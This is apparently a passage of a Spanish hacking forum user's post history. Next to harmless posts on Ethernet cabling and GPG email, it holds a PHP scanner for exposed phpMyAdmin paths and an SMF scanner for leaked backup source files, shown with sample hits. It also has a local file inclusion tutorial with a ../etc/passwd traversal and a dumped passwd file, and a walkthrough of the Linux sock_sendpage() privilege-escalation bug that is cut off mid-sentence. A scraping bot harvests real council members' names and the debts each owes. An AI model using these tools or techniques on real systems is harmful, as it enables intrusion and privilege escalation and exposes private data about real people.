                                   '/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/',
                                   '/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/',
                                   '/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/',
                                   '/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/',
                                   '/PMA2005/', '/pma2005/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/',
   '/mysql-admin/','/mya/','/robots.txt','/phpinfo.php',
  );
echo '<div id="resultados">';
echo '<table>';
  foreach($list as $path => $test)
{
                                         $ch = curl_init();
                                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                         curl_setopt($ch, CURLOPT_HEADER, 1);
                                         curl_setopt($ch, CURLOPT_URL, $target.$test);
                                         $pma = curl_exec($ch);
curl_close($ch);
if (preg_match("/200 OK/", $pma))
{
echo '<tr><td class="resultados ">';
    ob_flush();
echo '[!] <a href="'.$target.$test.'" target="_blank">'.$target.$test.'</a>';
flush();
echo '</td></tr>';
}
}
echo '</table>';
echo '</div><br>';
                     echo '<div id="resultados">';
                     echo '<td class="resultados ">Analisis Finalizado. <a href="'.$_SERVER['PHP_SELF'].'">¿Deseas chequear otro sitio?</a></td>';
echo '</div>';
                     }
                     else
{
echo '<div id="resultados">';
                         echo '¡No es posible establecer conexion con el sitio!<br><td class="resultados "><a href="'.$_SERVER['PHP_SELF'].'">¿Deseas chequear otro sitio?</a></td>
   </div>';
                        }
}
?>
</div>
</center>
</body>
</html>
#16
Redes y antenas / Armado de cables de red
Febrero 22, 2013, 04:05:31 PM
Si usamos cable de categoría 5/5e o categoría 6, lo podremos usar para Fast Ethernet (100Mbps) según el estándar 100BASE-TX del nivel física Ethernet y para Gigabit Ethernet (1Gbps) según el estándar 1000BASE-T.

Según el estándar TIA/EIA-568-B hay dos posibilidades para hacer corresponder cada cable según su color con cada pin del conector RJ45: Tenemos el cableado T568A y el cableado T568B. Normalmente haremos cables usando la misma correspondencia en ambos extremos, pero si queremos hacer un cable cruzado para Fast Ethernet, tenemos que hacer un cable con T568A en un extremo y con T568B en el otro. Como Fast Ethernet sólo usa dos pares (el de TX y el de RX), lo que estamos haciendo es unir el TX de un sistema con el RX del otro sistema y dejar el resto de pares sin cruzar (marrón, blanco-marrón y azul, blanco-azul).



Cables normales T568A y T568B:





Cables cruzados T568A y T568B (son exactamente iguales):





Hay que tener en cuenta que Gigabit Ethernet usa los cuatro pares, no sólo dos. Por eso, si queremos hacer un cable cruzado para Gigabit tenemos que cruzar todos los pares:





Ya que conocemos las normas, dejo un vídeo para que sepan como es el correcto armado del mismo!

#17
Seguridad / Web Scraping
Febrero 22, 2013, 04:03:39 PM
Hoy voy a comentar algo que me gusta mucho: "Web Scraping" o como seria en español: "El raspado web" esta técnica se utiliza mucho en lo que refiere a la implementacion "Algorithmic Tradings"

Antes de ver un par de lineas de código, voy a dejar una breve y muy pobre descripción de lo que a mi entender (corto  ) viene a ser el Web Scraping.

Raspado Web (recolección en la web o la extracción de datos web) es una técnica de software de extracción de información de sitios web . Por lo general, este tipo de programas de software de simulación de la exploración humana de la World Wide Web , ya sea siguiendo bajo nivel de transferencia de hipertexto (HTTP), e incorporación de un navegador web en toda regla, como por ejemplo Internet Explorer o Mozilla Firefox-

El "Web Scraping" se centra más en la transformación de los datos no estructurados en la Web, por lo general en formato HTML , en datos estructurados que pueden ser almacenados (o no) y analizados en una base de datos central local o de hoja de cálculo. También está relacionada con la automatización web, que simula la navegación humana utilizando software informático. Incluyen la comparación de precios en línea, seguimiento de datos de tiempo, detección de cambios en sitio web, investigación, mashup web, entre una larga lista de etcéteras

Técnicas:

Humanos copiando y pegando a mano.
Robots de texto y expresiones regulares.
Programación HTTP.
Algoritmos de minería de datos.
Análisis de DOM.
Analizadores HTML.

En mi caso y por un gusto en particular elijo el de robots de texto y expresiones regulares  con PHP, lenguaje que me encanta y ademas me parece muy sencillo

Dejo un script que prepare como Prueba de Concepto de lo citado arriba... La web que se presta para este tipo de técnica es "El Consejo Profesional de Ciencias Informática de Catamarca".



El script en resumen lo que se encarga de hacer es listar la cantidad de matriculados que hay, y al mismo tiempo realiza una consulta (en la misma web) dejando en evidencia la cantidad de cuotas que cada matriculado adeuda, cosa que debería ser privado.
Me llama la atención que este mismo Consejo es el que esta en contra de el "Ejercicio Ilegal" por no estar matriculado ( o recibido) pero los mismo a mi parecer no demuestran conocimiento alguno como para poder decir quien puede o no trabajar, a pesar de que dicten cursos de seguridad y traigan disertantes, parece que no aprendieron nada de lo intentan fomentar...

Lo que me preocupa es si cumplen con la ley que establece el Registro Nacional de Base de Datos para que las entidades que poseen información en la nube, resguarden estos datos.
Si alguien quiere saber lo que dice la ley: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por ultimo les comparto un enlace sobre la matriculación obligatoria que me gustaria que todos se den un tiempo para leer:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código Fuente CPCICAT-BOT

Código: php

<!DOCTYPE html>
<html>
  <head>
  <style type="text/css">
  body{
color: #FFF;
background-color: #000;
}


  </style>
  </head>
<body>
<title>Web Scraping - CPCICAT_BOT</title>

 
<?php
ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3');
$cantidad_center = (int) $cantidad_center;
$listado = "http://www.cpcicat.org.ar/listado-de-matriculados.html"; // URL de donde obtengo los nombres e ids de los matriculados.
$cupones = "http://www.cpcicat.org.ar/scripts/pagos/cupon.php?socio="; // URL donde hare la consulta de lo que adeudan.
$codigo_fuente_listado = file_get_contents($listado);
$codigo_fuente_listado = utf8_decode($codigo_fuente_listado);
$quito_tag_tbody = explode('<tbody>',$codigo_fuente_listado);
$quito_tag_tbody = explode('</tbody>',$quito_tag_tbody[1]);

$ids_center = explode('<td style="text-align: center">', $quito_tag_tbody[0]);
$cantidad_center = count($ids_center);

$explode_tds = explode('</td><td>',$quito_tag_tbody[0]);
$i=1;
for($x=1;$x<270;$x++)
{
ob_flush();
echo '<font color="#666">Nombre y Apellido:</font> '.$explode_tds[$x];
$explode_limpia = explode('</td><td style="text-align: center">',$explode_tds[$x+1]);
echo " ".$explode_limpia[0]." ";
$x = $x+1;
$adeuda = $cupones.$i;
$fuente_deuda = file_get_contents($adeuda);
$explodeo_deuda = explode('<form>',$fuente_deuda);
$explodeo_deuda = explode('<select name="users" onchange="mostrarMonto('.$i.', this.value)">',$explodeo_deuda[1]);
$explodeo_deuda = str_replace('Ud. adeuda','',$explodeo_deuda);
echo '<font color="#666">Adeuda: </font>'.$explodeo_deuda[0]."<br>";
$i++;
flush();
}


?>
#18
GPG es estable, calificado como un software para el uso en producción y es comúnmente incluido en los sistemas operativos como FreeBSD, OpenBSD, NetBSD y últimamente con todas las distribuciones GNU/Linux.

GPG cifra los mensajes usando pares de claves individuales asimétricas generadas por los usuarios. Las claves públicas pueden ser compartidas con otros usuarios de muchas maneras, un ejemplo de ello es depositándolas en los servidores de claves. Siempre deben ser compartidas cuidadosamente para prevenir falsas identidades por la corrupción de las claves públicas. También es posible añadir una firma digital criptográfica a un mensaje, de esta manera la totalidad del mensaje y el remitente pueden ser verificados en caso de que se desconfíe de una correspondencia en particular.
GnuPG también soporta algoritmos de cifrado simétricos, por ejemplo CASTS.
GPG no usa algoritmos de software que están restringidos por patentes, entre estos se encuentra el algoritmo de cifrado IDEA que está presente en PGP casi desde sus inicios. En su lugar usa una serie de algoritmos no patentados como ElGamal, CAST5, Triple DES (3DES), AES y Blowfish. También es posible usar IDEA en GPG descargando un plugin extra, sin embargo este puede requerir una licencia para usuarios de algunos países en donde esté patentada IDEA.
GPG es un software de cifrado híbrido que usa una combinación convencional de criptografía de claves simétricas para la rapidez y criptografía de claves públicas para el fácil compartimiento de claves seguras, típicamente usando recipientes de claves públicas para cifrar una clave de sesión que es usada una vez. Este modo de operación es parte del estándar OpenPGP y ha sido parte del PGP desde su primera versión.

Lo primero que debemos hacer para poder utilizar GPG de manera sencilla y rapida en nuestros mails es instalar en Chrome el Add-on (extension) Mymail-Crypt



Una vez hecho eso vamos a crear nuestras llaves (publica y privada)



Completamos con los datos que solicita




Una vez creada ya podemos ver las llaves privadas que tenemos en uso.



Tambien podemos ver la llave publica (que es la que debemos entregar a nuestros amigos para que se puedan comunicar con nosotros)
Donde dice insert public key, debemos de ingresar la de nuestros conocidos para poder comunicarnos con ellos  [moquito]



La debemos guardar en un documento con extension .asc y con el nombre de la casilla de correo: ejemplo staff.remoteexecution.asc



Para muestra basta y sobra un boton, asi que ahora lo que hacemos es escribir el mail y luego poner la contraseña que se nos solicito que pusieramos en la configuracion del Add-on



De esa manera queda firmado y encryptado el mensaje en cuestion.



Por lo tanto la unica manera de que alguien conozca el contenido de el mail, sera solo porque hemos compartido llave publica.



Y para descifrarlo solo debe ingresar el password y darle en decrypt

#19
Back-end / SMF Source Code Disclosure Seeker
Septiembre 02, 2011, 12:20:11 PM
Esta tool no se si sera muy util pero por las dudas me tome el tiempo de hacerla, mas que nada sirve para ver los archivos temporales que fueron creados cuando se instalan nuevos modulos en el sistema de smf. Les dejo el codigo.

Código: php

<html>
<title>SMF Source Code Disclosure Seeker</title>
<style type="text/css">
body{
    background: #000;
    color: #FFF;
    }
a:visited{
         color:#FFF;
         text-decoration: none;
         }
a:link{
         color:#FFF;
         text-decoration: none;
         }
a:hover{
         color:#FF0000;
         text-decoration: blink;
         }
input,option{
     font-family: verdana, sans-serif;
     font-size: 16pt;
     border: gray 2px solid;
     }           
#links{
       margin:0 auto;
       width:860px;
       border-color: #E8E8E8;
       text-align: right;
       }
</style>
<body>
<div id="links">
<center>
<img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
<form action ="" method="post">
URL : <input type ="text" name="site" size="50"/>
<input type = "submit" value="Test!" />
</form>
<?php
/**
*
*
* @author Daniel Godoy
* @copyright 2011
* @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
*
*  This program is free software: you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation, either version 3 of the License, or
*  (at your option) any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
*
*
**/
set_time_limit(0);
$site = $_POST['site'];
$list = array('index.php~', 'Settings.php~','Settings_bak.php~','/Sources/Admin.php~','/Sources/BoardIndex.php~','/Sources/Calendar.php~','/Sources/Display.php~',
              '/Sources/Errors.php~','/Sources/DumpDatabase.php~','/Sources/Help.php~','/Sources/index.php~','/Sources/Karma.php~','/Sources/Load.php~',
              '/Sources/LockTopic.php~','/Sources/LogInOut.php~','/Sources/ManageAttachments.php~','/Sources/ManageBans.php~','/Sources/ManageBoards.php~',
              '/Sources/ManageCalendar.php~','/Sources/ManageErrors.php~','/Sources/ManageMembergroups.php~','/Sources/ManageMembers.php~',
              '/Sources/ManageNews.php~','/Sources/ManagePermissions.php~','/Sources/ManagePosts.php~','/Sources/ManageRegistration.php~',
              '/Sources/ManageSearch.php~','/Sources/ManageServer.php~','/Sources/ManageShoutbox.php~','/Sources/ManageSmileys.php~','/Sources/Memberlist.php~',
              '/Sources/MessageIndex.php~','/Sources/Memberlist.php~','/Sources/MessageIndex.php~','/Sources/Modlog.php~','/Sources/ModSettings.php~',
              '/Sources/MoveTopic.php~','/Sources/News.php~','/Sources/Notify.php~','/Sources/PackageGet.php~','/Sources/Packages.php~','/Sources/PersonalMessage.php~',
              '/Sources/Poll.php~','/Sources/Post.php~','/Sources/Printpage.php~','/Sources/Profile.php~','/Sources/QueryString.php~','/Sources/Recent.php~',
              '/Sources/Register.php~','/Sources/Reminder.php~','/Sources/RemoveTopic.php~','/Sources/RepairBoards.php~','/Sources/Reports.php~','/Sources/Search.php~',
              '/Sources/Security.php~','/Sources/SendTopic.php~','/Sources/Shoutbox.php~','/Sources/SplitTopics.php~','/Sources/Stats.php~',
              '/Sources/Subs-Auth.php~','/Sources/Subs-Boards.php~','/Sources/Subs-Charset.php~','/Sources/Subs-Compat.php~','/Sources/Subs-Graphics.php~',
              '/Sources/Subs-Members.php~','/Sources/Subs-Package.php~','/Sources/Subs-Post.php~','/Sources/Subs-Shoutbox.php~','/Sources/Subs-Sound.php~',
              '/Sources/Subs.php~','/Sources/Themes.php~','/Sources/ViewQuery.php~','/Sources/Who.php~','/Themes/default/Admin.template.php~',
              '/Themes/default/BoardIndex.template.php~','/Themes/default/Calendar.template.php~','/Themes/default/Combat.template.php~',
              '/Themes/default/Display.template.php~','/Themes/default/Errors.template.php~','/Themes/default/Help.template.php~','/Themes/default/index.php~',
              '/Themes/default/index.template.php~','/Themes/default/Login.template.php~','/Themes/default/ManageAttachments.template.php~',
              '/Themes/default/ManageBans.template.php~','/Themes/default/ManageBoards.template.php~','/Themes/default/ManageCalendar.template.php~',
              '/Themes/default/ManageMembergroups.template.php~','/Themes/default/ManageMembers.template.php~','/Themes/default/ManageNews.template.php~',
              '/Themes/default/ManagePermissions.template.php~','/Themes/default/ManageSearch.template.php~','/Themes/default/ManageShoutbox.template.php~',
              '/Themes/default/ManageSmileys.template.php~','/Themes/default/Memberlist.template.php~','/Themes/default/MessageIndex.template.php~',
              '/Themes/default/Modlog.template.php~','/Themes/default/MoveTopic.template.php~','/Themes/default/Notify.template.php~',
              '/Themes/default/Packages.template.php~','/Themes/default/PersonalMessage.template.php~','/Themes/default/Poll.template.php~',
              '/Themes/default/Post.template.php~','/Themes/default/Printpage.template.php~','/Themes/default/Profile.template.php~',
              '/Themes/default/Recent.template.php~','/Themes/default/Register.template.php~','/Themes/default/Reminder.template.php~',
              '/Themes/default/Reports.template.php~','/Themes/default/Search.template.php~','/Themes/default/SendTopic.template.php~','/Themes/default/Settings.template.php~',
              '/Themes/default/Shoutbox.template.php~','/Themes/default/SplitTopics.template.php~','/Themes/default/Stats.template.php~',
              '/Themes/default/Themes.template.php~','/Themes/default/Who.template.php~','/Themes/default/Wireless.template.php~','/Themes/default/Xml.template.php~',
              '/Themes/default/languages/Admin.english.php~','/Themes/default/languages/Admin.spanish_latin.php~','/Themes/default/languages/Errors.english.php~',
              '/Themes/default/languages/Errors.spanish_latin.php~','/Themes/default/languages/Help.english.php~','/Themes/default/languages/Help.spanish_latin.php~',
              '/Themes/default/languages/index.english.php~','/Themes/default/languages/index.spanish_latin.php~','/Themes/default/languages/Install.english.php~',
              '/Themes/default/languages/Install.spanish_latin.php~','/Themes/default/languages/Login.english.php~','/Themes/default/languages/Login.spanish_latin.php~',
              '/Themes/default/languages/ManageBoards.english.php~','/Themes/default/languages/ManageBoards.spanish_latin.php~','/Themes/default/languages/ManageCalendar.english.php~',
              '/Themes/default/languages/ManageCalendar.spanish_latin.php~','/Themes/default/languages/ManageMembers.english.php~','/Themes/default/languages/ManageMembers.spanish_latin.php~',
              '/Themes/default/languages/ManagePermissions.english.php~','/Themes/default/languages/ManagePermissions.spanish_latin.php~','/Themes/default/languages/ManageSmileys.english.php~',
              '/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~','/Themes/default/languages/Manual.spanish_latin.php~',
              '/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~',
              '/Themes/default/languages/Manual.spanish_latin.php~','/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/Modifications.spanish_latin.php~',
              '/Themes/default/languages/ModSettings.english.php~','/Themes/default/languages/ModSettings.spanish_latin.php~','/Themes/default/languages/Packages.english.php~',
              '/Themes/default/languages/Packages.spanish_latin.php~','/Themes/default/languages/PersonalMessage.english.php~','/Themes/default/languages/PersonalMessage.spanish_latin.php~',
              '/Themes/default/languages/Post.english.php~','/Themes/default/languages/Post.spanish_latin.php~','/Themes/default/languages/Profile.english.php~',
              '/Themes/default/languages/Profile.spanish_latin.php~','/Themes/default/languages/Reports.english.php~','/Themes/default/languages/Reports.spanish_latin.php~',
              '/Themes/default/languages/Search.english.php~','/Themes/default/languages/Search.spanish_latin.php~','/Themes/default/languages/Settings.english.php~',
              '/Themes/default/languages/Settings.spanish_latin.php~','/Themes/default/languages/Shoutbox.english.php~','/Themes/default/languages/Stats.english.php~',
              '/Themes/default/languages/Stats.spanish_latin.php~','/Themes/default/languages/Themes.english.php~','/Themes/default/languages/Themes.spanish_latin.php~',
              '/Themes/default/languages/Who.english.php~','/Themes/default/languages/Who.spanish_latin.php~','/Themes/default/languages/Wireless.english.php~',
              '/Themes/default/languages/Wireless.spanish_latin.php~',             
             );

if(isset($site)){
                foreach($list as $path => $test) {
                                                 $ch = curl_init();
                                                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                 curl_setopt($ch, CURLOPT_HEADER, 1);
                                                 curl_setopt($ch, CURLOPT_URL, $site.$test);
                                                 $result = curl_exec($ch);
                                                 curl_close($ch);
if (preg_match("/200 OK/", $result)){
                                    flush();
                                    echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
                                    ob_flush();
                                    }
                                   
                                 
                                                }     
                }

?>
</center>
</div>
</body>
</html>


Ejemplo obtenido al correr el script.

[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/BoardIndex.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Load.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/ManageBoards.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/ManagePermissions.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/ManagePosts.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/ManageRegistration.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/ManageSearch.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Modlog.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/ModSettings.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/PersonalMessage.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Post.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Profile.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Recent.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Register.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Search.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Subs-Boards.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Subs-Graphics.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Subs-Members.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Subs.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Sources/Who.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Admin.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/BoardIndex.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Display.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/index.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/ManageBoards.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/ManageSearch.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Modlog.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/PersonalMessage.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Post.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Profile.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Register.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/Search.template.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/Errors.english.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/Help.english.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/Login.english.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/Modifications.english.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/Modifications.english.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/ModSettings.english.php~
[!] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/Themes/default/languages/Who.english.php~
#20
Pentesting / Local File Inclusion
Agosto 27, 2011, 08:39:31 PM
Este paper lo escribí hace como 4 años mas o menos  O_O
Es algo básico pero creo que se entiende el concepto bastante bien.
[LFI]Local File Inclusion
Es un exploit que permite incluir archivos locales, como por ejemplo /etc/passwd <--- es el que se utiliza para probar si se puede explotar el sitio es vulnerable a lfi. un ejemplo vulnerable a LFI seria.

Código: php

<?php
$page = $_GET['page'];
include($page);
?>


$_GET es el metodo que utilizamos para recoger los valores o variables introducidas por el usuario, y se veria algo asi
Código: php
 view.php?file=EntradaUsuario

el resultado seria algo asi No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
esto incluria lo que el usuario le indica... es decir el archivo existente en la pagina actual. ahora teniendo un poco de concomiento acerca de como se produce el lfi Vamos a probar si entendimos los conceptos. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Esto debe incluir el archivo /etc/passwd en la página actual. El'../' significa subir un directorio. (seguro que si alguien uso dreamweaver le resultara familiar, a la hora de indicar donde se encuentra los archivos de la pagina) por lo general los directorios esta distribuidos de este modo "/home/nombredelhost/sitios/www.pagina.com/" y el archivo vulnerable (view.php)se encuentra en "/home/nombredelhost/sitios/www.pagina.com/file.php". como se imaginan /home/ es un directorio, /nombre del host/ es directorio, /sitios/ es directorio y /www.pagina.com/ tambien, lo que nos que hacer es ir al directorio raíz "/" en donde recine podremos tener acceso a /etc/Passwd Por lo tanto, en la url, para incluir el archivo /etc/passwd retrocedemos 4 directorios: ../../../../etc/passwd NOTA: si open_basedirrestriction estuviese desactivado este bug no funciona ya que solo permite incluir archivos ende su sitio y no del servidor.
  • Ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Código: php

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    vcsa:x:69:69:virtual console memory
    owner:/dev:/sbin/nologin nscd:x:28:28:NSCD
    Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated
    SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous
    NFS User:/var/lib/nfs:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    mysql:x:500:500::/home/mysql:/sbin/nologin
    postgres:x:501:501::/home/postgres:/bin/bash
    mailadm:x:502:502::/home/mailadm:/sbin/nologin
    webmail:x:503:503::/home/webmail:/bin/bash
    lu:x:504:504::/home/lu:/bin/bash
    public:x:505:506::/home/www/publicpage:/bin/bash
    stu:x:506:508::/home1/stu:/bin/bash

#21
Pentesting / Explotando sock_sendpage()
Agosto 27, 2011, 08:38:28 PM
Este fallo data de 8 años y nadie se había dado cuenta...
La vulnerabilidad aquí citada aprovecha fallos en los kernels que van desde la versión
2.4.4 hasta 2.4.37.4 y desde 2.6.0 a la 2.6.30.4 permitiendo elevar privilegios de usuario
normal a root...
El error que analizaremos en esta ocasión esta en la funcion sock_sendpage() que se encuentra
en net/socket.c y el problema particularmente se encuentra en la llamada a sendpage() que no
verifica si el puntero se ha inicializado.

Código: php

    static ssize_t sock_sendpage(struct file *file, struct page *page, 
                  int offset, size_t size, loff_t *ppos, int more) 
    { 
       struct socket *sock; 
       int flags; 
     
       sock = file->private_data; 
     
       flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT; 
      if (more) 
         flags |= MSG_MORE; 
     
      return sock->ops->sendpage(sock, page, offset, size, flags); 
   }


Código: php

static ssize_t sock_sendpage(struct file *file, struct page *page,
              int offset, size_t size, loff_t *ppos, int more)
{
   struct socket *sock;
   int flags;

   sock = file->private_data;

   flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
   if (more)
      flags |= MSG_MORE;

   return sock->ops->sendpage(sock, page, offset, size, flags);
}




Hemos visto que no se verifica si el puntero a sendpage() esta correctamente inicializado. Sera necesario ahora, encontrar situaciones en las que el puntero a la función sendpage() no se haya inicialiado.
Tavis Ormandy y Julien Tinnes (De el equipo de seguridad informatica de Google) en su investigación localizaron deficiencias en la incialización del puntero para la macro SOCKOPS_WRAP, definida en include/linux/net.h, que incluye PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 y PF_AX25. Tambien encontraron deficiencias en otros protocolos como PF_BLUETOOTH, PF_IUCV, PF_INET6 (con IPPROTO_SCTP), PF_PPPOX y PF_ISDN.
Prestemos atencion al protocolo Bluetooth, ubicado en net/bluetooth/bnep/sock.c donde encontraremos la estructura bnet_sock_ops en la que no se inicializa sendpage con sock_no_sendpage(), en ese caso quedara apuntando a NULL.

Código: php

static const struct proto_ops bnep_sock_ops = {
        .family         = PF_BLUETOOTH,
        .owner          = THIS_MODULE,
        .release        = bnep_sock_release,
        .ioctl          = bnep_sock_ioctl,
#ifdef CONFIG_COMPAT
        .compat_ioctl   = bnep_sock_compat_ioctl,
#endif
        .bind           = sock_no_bind,
        .getname        = sock_no_getname,
        .sendmsg        = sock_no_sendmsg,
        .recvmsg        = sock_no_recvmsg,
        .poll           = sock_no_poll,
        .listen         = sock_no_listen,
        .shutdown       = sock_no_shutdown,
        .setsockopt     = sock_no_setsockopt,
        .getsockopt     = sock_no_getsockopt,
        .connect        = sock_no_connect,
        .socketpair     = sock_no_socketpair,
        .accept         = sock_no_accept,
        .mmap           = sock_no_mmap
};




Veamos la macro SOCOPS_WRAP, casi no se nota el error pero prestemos atencion a la ultima linea.

Código: php
static const struct proto_ops SOCKOPS_WRAPPED(ipx_dgram_ops) = {
        .family         = PF_IPX,
        .owner          = THIS_MODULE,
        .release        = ipx_release,
        .bind           = ipx_bind,
        .connect        = ipx_connect,
        .socketpair     = sock_no_socketpair,
        .accept         = sock_no_accept,
        .getname        = ipx_getname,
        .poll           = datagram_poll,
        .ioctl          = ipx_ioctl,
#ifdef CONFIG_COMPAT
        .compat_ioctl   = ipx_compat_ioctl,
#endif
        .listen         = sock_no_listen,
        .shutdown       = sock_no_shutdown, /* FIXME: support shutdown */
        .setsockopt     = ipx_setsockopt,
        .getsockopt     = ipx_getsockopt,
        .sendmsg        = ipx_sendmsg,
        .recvmsg        = ipx_recvmsg,
        .mmap           = sock_no_mmap,
        .sendpage       = sock_no_sendpage,
};


Bueno ahora que conocemos donde esta el error, veamos como aprovecharlo...
Para tal caso debemos contar con una funcion que podamos ejecutar en espacio de usuario
que use la funcion sock_sendpage(), existen muchas...la propuesta en este caso es sendfile().
Forzaremos el uso de sendpage() con la siguente secuencia:

Código: php
/* ... */
int fdin = mkstemp(template);
int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);

unlink(template);

ftruncate(fdin, PAGE_SIZE);

sendfile(fdout, fdin, NULL, PAGE_SIZE);
/* ... */


Cuando se ejecute la funcion sendpage(), si no esta inicializada y apuntando a NULL,
el kernel tratara de ejecutar las instrucciones que hay en la direccion 0, mapeando dicha
